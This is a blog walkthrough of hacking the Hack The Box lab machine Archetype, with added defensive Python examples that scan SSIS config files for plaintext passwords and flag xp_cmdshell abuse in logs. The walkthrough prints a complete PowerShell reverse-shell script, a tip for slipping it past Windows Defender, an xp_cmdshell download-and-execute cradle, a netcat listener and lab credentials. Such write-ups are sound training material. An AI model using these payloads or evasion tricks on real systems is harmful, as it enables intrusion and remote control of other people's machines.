Archetype has been Pwned!


Reconnaissance

Today we’re going to be hacking into the Hack The Box machine Archetype. This machine is one of the Starting Point machines that I will be hacking my way through. OK, let’s begin. Once you have spun up the box and connected to the VPN it’s time to get scanning. I tend to run nmap with the following flags:

sudo nmap -sC -sV -O -p0- 10.10.10.27

This will scan all ports and check for the service version, the operating system version and will run any “safe scripts” against the discovered services. It’s not always a good idea to run the vulnerability script but on this occasion I did. The results are shown below.

PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
| smb-vuln-ms08-067:
| VULNERABLE:
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250

Based on the results I initially went after the MS08-067 vulnerability. I used Metasploit to try and hack it but alas, no such luck. There was a problem with the language detection on the remote host so the exploit didn’t work.

The next service I went after was the Server Message Block protocol. The tool smbclient can be used to list the shared directories being served by the SMB service.

smbclient -L 10.10.10.27
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

Based on the results from smbclient it was evident that the backups directory could be mounted.

smbclient \\\\10.10.10.27\\backups

The backups directory contained a file called prod.dtsConfig. It was possible to download this file and view the contents. The file appeared to be a configuration file and contained the password of the ARCHETYPE\sql_svc MSSQL user.

<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="…" GeneratedFromPackageName="…" GeneratedFromPackageID="…" GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
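From the defender's side, the real lesson of prod.dtsConfig is that an SSIS configuration sitting on a readable share carried a SQL Server password in clear text. The following added example (my code, not the author's or Microsoft's) parses a file of the same structure and reports every ConnectionString property that embeds a password; the sample file and its password are constructed, not the ones from the box.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the same shape as the prod.dtsConfig found on the share
# (the password is made up; the second connection uses integrated auth and is clean).
SAMPLE_DTSCONFIG = """<DTSConfiguration>
<DTSConfigurationHeading><DTSConfigurationFileInfo GeneratedBy="svc"/></DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=Example_P4ss;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
</Configuration>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""

SECRET_KEYS = ("password", "pwd")  # connection-string keys that carry a secret in clear text


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value' into a dict keyed by lower-cased names."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = val.strip()
    return pairs


def mask(secret):
    """Keep only the first character so the report itself does not re-leak the secret."""
    return secret[:1] + "*" * (len(secret) - 1)


def find_plaintext_credentials(xml_text):
    """One finding per ConnectionString property that embeds a password."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        path = conf.get("Path", "")
        value = conf.findtext("ConfiguredValue") or ""
        if not path.endswith("Properties[ConnectionString]"):
            continue
        pairs = parse_connection_string(value)
        secret_key = next((k for k in SECRET_KEYS if k in pairs), None)
        if secret_key is None:
            continue  # integrated auth or no password: nothing leaked here
        findings.append({
            "path": path,
            "user": pairs.get("user id", "<none>"),
            "password": mask(pairs[secret_key]),
            # Persist Security Info=True keeps the password readable after the connection opens.
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
        })
    return findings
```

Run the scanner over every *.dtsConfig reachable from a share audit; a finding with persist_security_info set is the worst case because the password also survives in memory and in any object that copies the connection string.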

Foothold Hack

OK, time to start hacking. It was then possible to connect to the MSSQL service using the credentials from the prod.dtsConfig file. To connect to the MSSQL service I used the Impacket tool mssqlclient.py.

python mssqlclient.py ARCHETYPE/[email protected] -windows-auth

After providing the password I was logged on to the server. To check whether we had sysadmin level privileges I ran the following command.

SELECT IS_SRVROLEMEMBER('sysadmin')

It appeared that I had sysadmin level privileges so it was time to get a reverse shell set up so I could connect to the box. To do this I pinched the following PowerShell script and modified it with my IP address and the port I wanted the server to connect back to me on.

$client = New-Object System.Net.Sockets.TCPClient("10.10.15.82",4000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "#";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

It is worth noting that I had a few issues with the following part of the script being picked up by Windows Defender. However, after some Google fu I discovered the particular parameter it didn’t like. It appears that Windows Defender doesn’t like "PS " + (pwd).Path + "> ". It was also quite particular about the spacing within the "#"; part of the script.

sendback + "PS " + (pwd).Path + "> ";$sendbyte =

With the script edited and my IP address and port added, it was time to host the script so that the remote server could download and execute it. To do this I used the Python http.server module to serve the file locally.

sudo python3 -m http.server 80

With the file being served on my local machine I had to set up a listener to receive the reverse connection from the server. To do this I used the netcat tool.

sudo nc -lvp 4000

Privilege Escalation Hack

Then on the remote server I ran a command to tell the server to download and execute the script being hosted on my local machine.

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.15.82/shell.ps1\");"
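What this step looks like in SQL Server telemetry is the useful defensive takeaway. The added example below (my code, not part of the write-up) runs a few detection rules over constructed audit-style lines: it flags the sysadmin role probe, the sp_configure call that enables xp_cmdshell (a step the post does not show but which must precede the call above unless the option was already on), and the PowerShell download cradle, then groups the hits per login so the whole chain stands out. The log line format is an assumption, not a real SQL Server audit layout.

```python
import re

# Constructed sample lines (not real logs): one line per captured SQL batch,
# roughly as a server audit or Extended Events session would record it.
SAMPLE_LOG = [
    "2019-01-20T10:05:11 login=ARCHETYPE\\sql_svc stmt=SELECT IS_SRVROLEMEMBER('sysadmin')",
    "2019-01-20T10:05:40 login=ARCHETYPE\\sql_svc stmt=EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "2019-01-20T10:06:02 login=ARCHETYPE\\sql_svc stmt=xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.example/shell.ps1\")'",
    "2019-01-20T10:07:15 login=ARCHETYPE\\reporting stmt=SELECT TOP 10 * FROM Catalog.dbo.Orders",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")

# Most specific rule first; the first match wins so a cradle is not downgraded to "executed".
RULES = [
    ("xp_cmdshell PowerShell download cradle", "critical",
     re.compile(r"xp_cmdshell.*powershell.*(DownloadString|DownloadFile|IEX|Invoke-Expression)", re.I)),
    ("xp_cmdshell enabled via sp_configure", "high",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)),
    ("xp_cmdshell executed", "medium", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("sysadmin role probe", "low", re.compile(r"IS_SRVROLEMEMBER\s*\(\s*'sysadmin'", re.I)),
]


def classify(stmt):
    """Return (rule, severity) for the first matching rule, or None."""
    for name, severity, pattern in RULES:
        if pattern.search(stmt):
            return name, severity
    return None


def detect(lines):
    """Turn raw log lines into alert dicts; lines that match no rule are dropped."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the pipeline
        hit = classify(m["stmt"])
        if hit:
            alerts.append({"ts": m["ts"], "login": m["login"], "rule": hit[0], "severity": hit[1]})
    return alerts


def chained_logins(alerts, minimum=2):
    """Logins that tripped several distinct rules: the probe, enable, execute sequence
    from this box shows up as one login with three different rules."""
    rules_by_login = {}
    for a in alerts:
        rules_by_login.setdefault(a["login"], set()).add(a["rule"])
    return sorted(l for l, r in rules_by_login.items() if len(r) >= minimum)
```

Beyond alerting, the mitigation is to leave xp_cmdshell disabled and to keep service accounts such as sql_svc out of the sysadmin role, so the probe fails before the rest of the chain starts.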

This created a reverse shell connection back to my local machine. It was then possible to browse the local file system and run commands as though I were logged on to it locally. The first thing I wanted to check, and that I recommend checking, is the PowerShell history. It may contain useful information left by the box creator or by other hackers.

#type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

BINGO, there was a valid set of credentials in the history. It was then possible to connect to the server using the Impacket psexec.py tool.

sudo python /usr/share/doc/python3-impacket/examples/psexec.py [email protected]

Once logged in as administrator it was possible to recover all the keys required to complete the box. Hacking is so much fun.

C:\Windows\system32>type C:\Users\sql_svc\Desktop\user.txt
3e7**********************a3
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
b91**********************528
Hack The Box Archetype has been pwned!

If you liked this post then check out some of my other ones. I have done write-ups for Archetype, Oopsie, Vaccine, Shield, Pathfinder and Included.